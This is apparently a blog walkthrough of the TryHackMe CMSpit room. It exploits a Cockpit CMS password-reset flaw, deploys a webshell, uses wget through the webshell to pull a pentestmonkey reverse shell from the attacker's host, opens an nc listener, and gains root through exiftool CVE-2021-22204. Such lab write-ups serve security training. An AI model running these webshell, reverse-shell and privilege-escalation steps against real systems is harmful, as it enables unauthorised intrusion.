narancs's blog

TryHackMe – CMSpit walkthrough

Introduction

Logo of CMSpit room on TryHackMe

This is a walkthrough of CMSpit room on TryHackMe. We need gain access to the target machine through a vulnerable CMS and escalate to root.

You've identified that the CMS installed on the web server has several vulnerabilities that allow attackers to enumerate users and change account passwords. Your mission is to exploit these vulnerabilities and compromise the web server.

Enumeration

What is the name of the Content Management System (CMS) installed on the server?

We can get this answer from the login page of the website.

Answer

				
					C*****t
				
			
What is the version of the Content Management System (CMS) installed on the server?

I found the answer by checking the source code of the login page.

Answer

				
					v*****1
				
			
What is the path that allow user enumeration?

By knowing the CMS name and the version, we can start looking for known exploits. I found the following website that explains the exploit in great detail: https://swarm.ptsecurity.com/rce-cockpit-cms/. At section 1 ‘Using the $eq operator’, there are several screenshots taken from Burp Suite that show the URL path in question.

Answer

				
					/a********k
				
			
How many users can you identify when you reproduce the user enumeration attack?

I found an exploit for this vulnerability on GitHub: https://github.com/0z09e/CVE-2020-35846

The code is sending 2 requests through a proxy:

				
					...
resetrequest = session.post(url + "/auth/requestreset" , json=request_data , proxies={"http" :"http://127.0.0.1:8080"})
...
token_request = session.post(url + "/auth/resetpassword"  , json=token_data , proxies={"http" :"http://127.0.0.1:8080"})
...
				
			
So we need to start a proxy on port 8080 (e.g. BurpSuite), or remove the proxies={"http" :"http://127.0.0.1:8080"} arguments from the 2 function calls in the code. Then we can execute the script against the target.
				
					python3 exploit.py http://<IP_ADDRESS>/
				
			

Answer

				
					Number of users in the output of the script :)
				
			
What is the path that allows you to change user account passwords?

Answer can be found in above script on GitHub by looking at the change_pass function and checking the URL path where it sends a request.

Answer

				
					/a****************d
				
			

Exploitation

Compromise the Content Management System (CMS). What is Skidy's email.

If you have successfully executed the script above, then you can see in the output that the password of the admin user has been changed to P@ssw0rd. We can login with these credentials and visit the /accounts page to find the email address of Skidy.

Answer

				
					The e-mail address of Skidy user from /accounts page
				
			
What is the web flag?

You can also see something similar in the output of the script:

				
					[+] Bingoo, File has been deployed successfully : vd1XDi.php
[+] File's location : http://10.10.190.141/vd1XDi.php
[*] Execution example : http://10.10.190.141/vd1XDi.php?cmd=id
[+] Output : uid=33(www-data) gid=33(www-data) groups=33(www-data)
[+] Good luck for Privilege Escalation :)
				
			

This means that a webshell was uploaded to the target, and we can execute commands with it.

				
					http://10.10.190.141/nUSvk3.php?cmd=ls -l
				
			

Once we visit this page, we will see a list of the files in the root directory of the webserver. We can see that there is a file named webflag.php, so we can use the cat command to display the output of this file. Then we need to view the source code of the page, otherwise the output is not visible as it is a PHP code.

				
					view-source:http://10.10.190.141/vd1XDi.php?cmd=cat%20webflag.php
				
			

Answer

				
					Grab the flag from webflag.php
				
			
Compromise the machine and enumerate collections in the document database installed in the server. What is the flag in the database?
I have gained a shell on the target using the following steps:
  • I downloaded the reverse shell from https://github.com/pentestmonkey/php-reverse-shell/blob/master/php-reverse-shell.php
  • I changed the following lines accordingly
    $ip = '127.0.0.1'; // CHANGE THIS
    $port = 1234; // CHANGE THIS
  • I started a Python HTTP server to server the file over HTTP
    python3 -m http.server
  • I used the webshell to download the reverse shell on the target machine
    http://10.10.190.141/vd1XDi.php?cmd=wget%20http://10.11.11.184:8000/rev_shell.php
  • I started a listener on the port I specified in the reverse shell
    nc -lvnp 1234
  • I visited http://10.10.190.141/rev_shell.php and I received a shell.

Then I stabilized the shell with the following commands:

				
					python3 -c 'import pty;pty.spawn("/bin/bash")'
export TERM=xterm
CTRL^Z
stty raw -echo; fg
				
			
I started look around on the host. Finally, I found a file in the home directory of stux named .dbshell. One of the commands in the file contained the flag that was inserted in the database.

Answer

				
					Get the flag from the .dbshell file
				
			
What is the user.txt flag?
The .dbshell file contains a command that was used to insert the user stux into the database. We can use the same password to switch to stux user on Linux, because the password was re-used.

Answer

				
					Switch to stux user with su command and grab the flag from user.txt
				
			
What is the CVE number for the vulnerability affecting the binary assigned to the system user? Answer format: CVE-0000-0000

We can check what commands can stux execute with sudo.

				
					stux@ubuntu:~$ sudo -l
Matching Defaults entries for stux on ubuntu:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User stux may run the following commands on ubuntu:
    (root) NOPASSWD: /usr/local/bin/exiftool
stux@ubuntu:~$ 
				
			

I checked for vulnerabilities of exiftool and I found the following: https://nvd.nist.gov/vuln/detail/CVE-2021-22204

Answer

				
					CVE-2021-22204
				
			
What is the utility used to create the PoC file?

I found an exploit for the vulnerability here: https://github.com/UNICORDev/exploit-CVE-2021-22204

In the script file exploit-CVE-2021-22204.py, there is a function called dependencies that defined the following variable.

				
					    deps = {'bzz':"sudo apt install djvulibre-bin",'djvumake':"sudo apt install djvulibre-bin",'exiftool':"sudo apt install exiftool"}
				
			

The name of the utility is listed in these dependencies.

Answer

				
					d******e
				
			
Escalate your privileges. What is the flag in root.txt?

Using the exploit at https://github.com/UNICORDev/exploit-CVE-2021-22204 we can create a malicious jpg file on our local machine. Then we can transfer that file to the target to perform the exploit.

Install the dependencies

				
					sudo apt install djvulibre-bin exiftool
				
			

Run the exploit

				
					python3 exploit.py -c '/bin/bash'
				
			

Transfer the file to the target (e.g. using Python HTTP server).

Use exiftool on the target, and get the root flag!

Table of Contents

Subscribe
Notify of
guest
0 Comments
Inline Feedbacks
View all comments

Related posts

0
Would love your thoughts, please comment.x
()
x